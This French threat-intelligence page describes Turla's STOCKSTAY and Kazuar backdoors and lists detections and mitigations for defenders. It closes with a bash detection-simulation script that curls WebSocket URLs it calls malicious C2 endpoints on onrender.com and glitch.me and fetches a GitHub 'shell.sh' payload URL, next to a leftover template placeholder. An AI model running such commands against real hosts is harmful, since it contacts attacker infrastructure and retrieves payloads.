Turla (Tempête Secrète): Explication des Backdoors STOCKSTAY et Kazuar
Detection stack
- AIDR
- Alert
- ETL
- Query
Résumé
Turla est un groupe APT de longue date, aligné avec la Russie, associé au FSB et connu pour ses opérations de cyber-espionnage contre des cibles gouvernementales et militaires. Le groupe s’appuie sur des logiciels malveillants personnalisés, y compris les portes dérobées STOCKSTAY et Kazuar, pour préserver un accès à long terme dans des environnements compromis. Il abuse également fréquemment de services cloud légitimes tels que GitHub et Cloudflare pour dissimuler le trafic de commande et contrôle.
Enquête
Le rapport examine l’évolution des ensembles d’outils malveillants de Turla, en se concentrant sur les familles STOCKSTAY et Kazuar. Il analyse les techniques de détournement d’infrastructure du groupe, son utilisation de plateformes serverless pour le commandement et contrôle, et sa capacité à exploiter des vulnérabilités telles que la traversée de chemin WinRAR. L’enquête met également en évidence l’utilisation par Turla du keying environnemental pour réduire l’exposition à l’analyse sandbox.
Atténuation
Les organisations devraient déployer une surveillance rigoureuse pour l’utilisation non autorisée de plateformes web de confiance telles que GitHub et Cloudflare lorsque les modèles de trafic apparaissent anormaux. Un correctif rapide des vulnérabilités comme CVE-2025-8088 est essentiel pour prévenir les écritures de fichiers non autorisées. Les défenseurs devraient également surveiller l’installation non autorisée de certificats racine et l’exécution suspecte de PowerShell ou VBScript pouvant indiquer une activité Turla.
Réponse
Si une activité Turla est détectée, les intervenants devraient isoler les hôtes affectés et enquêter sur les comptes d’administrateur local non autorisés. Un examen détaillé des arbres de processus devrait être effectué pour découvrir les chargements latéraux de DLL impliquant des binaires légitimes tels que les utilitaires de NVIDIA ou d’imprimante Brother. La télémétrie réseau devrait également être vérifiée pour un trafic WebSocket inhabituel, et le magasin de confiance de la machine devrait être examiné pour des changements de certificats suspects.
Flux d’Attaque
Détections
Points possibles de persistance [ASEPs – Software/NTUSER Hive] (via registry_event)
Voir
LOLBAS WScript / CScript (via process_creation)
Voir
Utilisation de Certutil pour l’encodage des données et les opérations Cert (via cmdline)
Voir
Chaînes PowerShell suspectes (via powershell)
Voir
Un service DNS dynamique possible a été contacté (via dns)
Voir
Activité de déchiffrement 3DES Kazuar PowerShell [Windows Powershell]
Voir
Détection de la communication C2 de Turla STOCKSTAY via WebSocket sécurisé et mise en scène sur GitHub [Webserver]
Voir
Exécution de simulation
Prérequis : La vérification de la télémétrie et de la ligne de base doit être passée.
Rationale : Cette section détaille l’exécution précise de la technique de l’adversaire (TTP) conçue pour déclencher la règle de détection. Les commandes et le narratif DOIVENT refléter directement les TTPs identifiés et visent à générer la télémétrie exacte attendue par la logique de détection. Des exemples abstraits ou non liés entraîneront une mauvaise interprétation.
-
Narratif & Commandes de l’attaque : Un adversaire a réussi à établir une base et tente maintenant de lancer une communication C2. Pour échapper à la détection, il utilise une approche « vivre-sur-le-terrain » en se connectant à une plateforme serverless hébergée sur
onrender.comvia une connexion WebSocket. Simultanément, il tente de récupérer une charge utile de second stade depuis un dépôt GitHub public pour se fondre dans le trafic des développeurs. La simulation utiliseracurlandwscat(si disponible) ou des requêtes web standard pour générer les modèles d’URL spécifiques définis dans la logique de détection. -
Script de test de régression : [Provide the exact, self-contained, and executable code snippet for the simulation.]
#!/bin/bash # Script de simulation pour la validation de détection C2 de STOCKSTAY echo "[+] Démarrage de la simulation : TTPs de STOCKSTAY C2" # 1. Déclencheur : C2 via WebSocket sur Render (URL Spécifique) echo "[*] Simulation de la connexion WebSocket à l'URL Render malveillante..." curl -k "wss://google-ai-labs-it.onrender.com/ws" # 2. Déclencheur : C2 via WebSocket sur Glitch (URL Spécifique) echo "[*] Simulation de la connexion WebSocket à l'URL Glitch malveillante..." curl -k "wss://wool-basalt-clock.glitch.me/ws" # 3. Déclencheur : Mise en scène sur GitHub (Correspondance de domaine large) echo "[*] Simulation de la mise en scène de charge utile via GitHub..." curl -I "https://github.com/malicious-actor/payload-repo/raw/main/shell.sh" echo "[+] Simulation complète. Vérifiez les alertes SIEM." -
Commandes de nettoyage :
# Aucun artefact persistant n'est créé sur l'hôte par cette simulation. # Assurez-vous que tout fichier bash temporaire est supprimé s'il a été créé. rm -f simulation_stockstay.sh